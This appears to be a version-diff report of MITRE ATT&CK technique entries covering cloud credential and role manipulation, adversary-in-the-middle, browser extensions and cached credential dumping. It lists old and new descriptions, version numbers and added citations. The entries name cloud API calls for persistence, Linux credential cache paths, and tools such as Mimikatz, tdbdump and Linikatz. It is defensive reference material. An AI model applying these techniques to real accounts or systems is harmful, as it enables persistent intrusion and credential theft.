description (new value): Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals) In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation) In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated. (Citation: Crowdstrike AWS User Federation Persistence)
x_mitre_version: 2.6 → 2.7

[T1098.003] Account Manipulation: Additional Cloud Roles

Current version: 2.4

Version changed from: 2.3 → 2.4


Old Description:
An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker) (Citation: Microsoft O365 Admin Roles)

This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.

For example, in AWS environments, an adversary with appropriate permissions may be able to use the `CreatePolicyVersion` API to define a new version of an IAM policy or the `AttachUserPolicy` API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)

New Description:
An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker) (Citation: Microsoft O365 Admin Roles)

This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.

For example, in AWS environments, an adversary with appropriate permissions may be able to use the `CreatePolicyVersion` API to define a new version of an IAM policy or the `AttachUserPolicy` API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)

In some cases, adversaries may add roles to adversary-controlled accounts outside the victim cloud tenant. This allows these external accounts to perform actions inside the victim tenant without requiring the adversary to [Create Account](https://attack.mitre.org/techniques/T1136) or modify a victim-owned account.(Citation: Invictus IR DangerDev 2024)

Details
values_changed (STIX field: old value → new value)
modified: 2023-10-03 17:37:41.250000+00:00 → 2024-03-29 18:29:06.873000+00:00
description (old value): An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker) (Citation: Microsoft O365 Admin Roles) This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts. For example, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)
description (new value): An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker) (Citation: Microsoft O365 Admin Roles) This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts. For example, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation) In some cases, adversaries may add roles to adversary-controlled accounts outside the victim cloud tenant. This allows these external accounts to perform actions inside the victim tenant without requiring the adversary to [Create Account](https://attack.mitre.org/techniques/T1136) or modify a victim-owned account.(Citation: Invictus IR DangerDev 2024)
x_mitre_version: 2.3 → 2.4
iterable_item_added (STIX field: new value)
external_references: {'source_name': 'Invictus IR DangerDev 2024', 'description': 'Invictus Incident Response. (2024, January 31). The curious case of DangerDev@protonmail.me. Retrieved March 19, 2024.', 'url': 'https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me'}

[T1557] Adversary-in-the-Middle

Current version: 2.4

Version changed from: 2.3 → 2.4


Old Description:
Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)

For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.(Citation: volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)

Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).

New Description:
Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)

For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)

Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).

Details
values_changed (STIX field: old value → new value)
modified: 2023-09-27 20:27:50.792000+00:00 → 2024-04-18 14:26:21.852000+00:00
description (old value): Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.(Citation: volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att) Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
description (new value): Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics) For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att) Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
x_mitre_version: 2.3 → 2.4
iterable_item_added (STIX field: new value)
external_references: {'source_name': 'Token tactics', 'description': 'Microsoft Incident Response. (2022, November 16). Token tactics: How to prevent, detect, and respond to cloud token theft. Retrieved December 26, 2023.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/11/16/token-tactics-how-to-prevent-detect-and-respond-to-cloud-token-theft/'}

[T1059.002] Command and Scripting Interpreter: AppleScript

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed (STIX field: old value → new value)
modified: 2022-10-19 15:37:28.071000+00:00 → 2024-03-01 19:06:05.126000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2

[T1550.001] Use Alternate Authentication Material: Application Access Token

Current version: 1.6

Version changed from: 1.5 → 1.6

New Mitigations:

Details
values_changed (STIX field: old value → new value)
modified: 2023-09-19 21:24:45.231000+00:00 → 2024-04-12 21:18:28.848000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.5 → 1.6
iterable_item_added (STIX field: new value)
x_mitre_contributors: Blake Strom, Microsoft Threat Intelligence

[T1071] Application Layer Protocol

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description:
Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.

New Description:
Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22)

New Mitigations:

Details
values_changed (STIX field: old value → new value)
modified: 2023-04-11 14:35:41.468000+00:00 → 2024-01-17 22:52:23.454000+00:00
description (old value): Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.
description (new value): Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 2.1 → 2.2
iterable_item_added (STIX field: new value)
external_references: {'source_name': 'Mandiant APT29 Eye Spy Email Nov 22', 'description': 'Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved August 17, 2023.', 'url': 'https://www.mandiant.com/resources/blog/unc3524-eye-spy-email'}
x_mitre_platforms: Network

[T1573.002] Encrypted Channel: Asymmetric Cryptography

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added (STIX field: new value)
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: False
values_changed (STIX field: old value → new value)
modified: 2021-04-20 19:27:46.484000+00:00 → 2023-12-26 20:59:21.941000+00:00
x_mitre_version: 1.0 → 1.1
iterable_item_added (STIX field: new value)
x_mitre_platforms: Network

[T1053.002] Scheduled Task/Job: At

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed (STIX field: old value → new value)
modified: 2023-08-11 21:13:52.767000+00:00 → 2023-11-15 14:38:10.876000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 2.1 → 2.2

[T1119] Automated Collection

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:
Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools.

This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments.

New Description:
Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals.

In cloud-based environments, adversaries may also use cloud APIs, data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data.(Citation: Mandiant UNC3944 SMS Phishing 2023)

This functionality could also be built into remote access tools.

This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments.

Details
values_changed (STIX field: old value → new value)
modified: 2022-04-11 18:40:24.795000+00:00 → 2024-01-02 13:35:57.680000+00:00
description (old value): Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments.
description (new value): Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data.(Citation: Mandiant UNC3944 SMS Phishing 2023) This functionality could also be built into remote access tools. This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments.
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2
iterable_item_added (STIX field: new value)
external_references: {'source_name': 'Mandiant UNC3944 SMS Phishing 2023', 'description': 'Mandiant Intelligence. (2023, September 14). Why Are You Texting Me? UNC3944 Leverages SMS Phishing Campaigns for SIM Swapping, Ransomware, Extortion, and Notoriety. Retrieved January 2, 2024.', 'url': 'https://www.mandiant.com/resources/blog/unc3944-sms-phishing-sim-swapping-ransomware'}

[T1547] Boot or Logon Autostart Execution

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX Field: Old value → New value
modified: 2023-03-30 21:01:42.099000+00:00 → 2024-04-16 12:26:07.945000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.1 → 1.2
iterable_item_added
STIX Field: New value
x_mitre_platforms: Network

[T1037] Boot or Logon Initialization Scripts

Current version: 2.3

Version changed from: 2.2 → 2.3


Old Description
Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.

New Description
Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019) Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.
Details
values_changed
STIX Field: Old value → New value
modified: 2023-08-11 20:54:55.991000+00:00 → 2024-04-16 12:23:13.621000+00:00
description: see Old Description and New Description above
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 2.2 → 2.3
iterable_item_added
STIX Field: New value
external_references: {'source_name': 'Anomali Rocke March 2019', 'description': 'Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.', 'url': 'https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang'}
external_references: {'source_name': 'Mandiant APT29 Eye Spy Email Nov 22', 'description': 'Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved August 17, 2023.', 'url': 'https://www.mandiant.com/resources/blog/unc3524-eye-spy-email'}
x_mitre_platforms: Network

[T1176] Browser Extensions

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition) Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions. Previous to macOS 11, adversaries could silently install browser extensions via the command line using the `profiles` tool to install malicious `.mobileconfig` files. In macOS 11+, the use of the `profiles` tool can no longer install configuration profiles, however `.mobileconfig` files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware)

New Description
Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition) Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions. Previous to macOS 11, adversaries could silently install browser extensions via the command line using the `profiles` tool to install malicious `.mobileconfig` files. In macOS 11+, the use of the `profiles` tool can no longer install configuration profiles, however `.mobileconfig` files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Defense Evasion](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: Browser Adrozek)
Details
values_changed
STIX Field: Old value → New value
modified: 2022-04-20 16:46:36.707000+00:00 → 2024-04-18 23:22:37.874000+00:00
description: see Old Description and New Description above
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.2 → 1.3
iterable_item_added
STIX Field: New value
external_references: {'source_name': 'Browser Adrozek', 'description': 'Microsoft Threat Intelligence. (2020, December 10). Widespread malware campaign seeks to silently inject ads into search results, affects multiple browsers. Retrieved February 26, 2024.', 'url': 'https://www.microsoft.com/en-us/security/blog/2020/12/10/widespread-malware-campaign-seeks-to-silently-inject-ads-into-search-results-affects-multiple-browsers/'}
external_references: {'source_name': 'Browers FriarFox', 'description': 'Raggi, Michael. Proofpoint Threat Research Team. (2021, February 25). TA413 Leverages New FriarFox Browser Extension to Target the Gmail Accounts of Global Tibetan Organizations. Retrieved February 26, 2024.', 'url': 'https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global'}
x_mitre_contributors: Manikantan Srinivasan, NEC Corporation India

[T1003.005] OS Credential Dumping: Cached Domain Credentials

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds) On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache) With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials. Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)

New Description
Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds) On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache) On Linux systems, Active Directory credentials can be accessed through caches maintained by software like System Security Services Daemon (SSSD) or Quest Authentication Services (formerly VAS). Cached credential hashes are typically located at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, such as `tdbdump`, on these database files to dump the cached hashes and use [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to obtain the plaintext password.(Citation: Brining MimiKatz to Unix) With SYSTEM or sudo access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining MimiKatz to Unix) Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)
Details
values_changed
STIX Field: Old value → New value
modified: 2023-10-19 18:37:57.025000+00:00 → 2024-04-18 23:47:54.553000+00:00
description: see Old Description and New Description above
x_mitre_version: 1.0 → 1.1
iterable_item_added
STIX Field: New value
external_references: {'source_name': 'Brining MimiKatz to Unix', 'description': 'Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.', 'url': 'https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf'}
